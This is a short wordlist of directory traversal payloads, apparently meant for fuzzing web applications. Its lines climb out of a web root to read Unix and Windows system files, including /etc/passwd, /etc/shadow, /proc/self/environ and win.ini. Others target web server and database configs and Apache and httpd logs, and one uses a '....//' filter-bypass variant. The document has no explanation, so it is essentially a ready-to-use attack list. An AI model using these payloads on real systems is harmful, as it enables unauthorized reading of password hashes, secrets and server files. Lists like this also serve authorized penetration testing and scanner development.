../../../../../etc/passwd
../../../../../../windows/win.ini
../etc/hosts
../../boot.ini
../../../../../../../../etc/shadow
....//....//....//....//etc/passwd
../../../../../../proc/self/environ
../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../boot.ini
../../../../../../../../etc/group
../../../../../../../../etc/issue
../../../../../../../../etc/hostname
../../../../../../../../etc/cron.d
../../../../../../../../etc/apache2/apache2.conf
../../../../../../../../etc/mysql/my.cnf
../../../../../../../../etc/httpd/conf/httpd.conf
../../../../../../../../etc/nginx/nginx.conf
../../../../../../../../var/log/auth.log
../../../../../../../../var/log/apache2/access.log
../../../../../../../../var/log/apache2/error.log
../../../../../../../../var/log/httpd/access_log
../../../../../../../../var/log/httpd/error_log
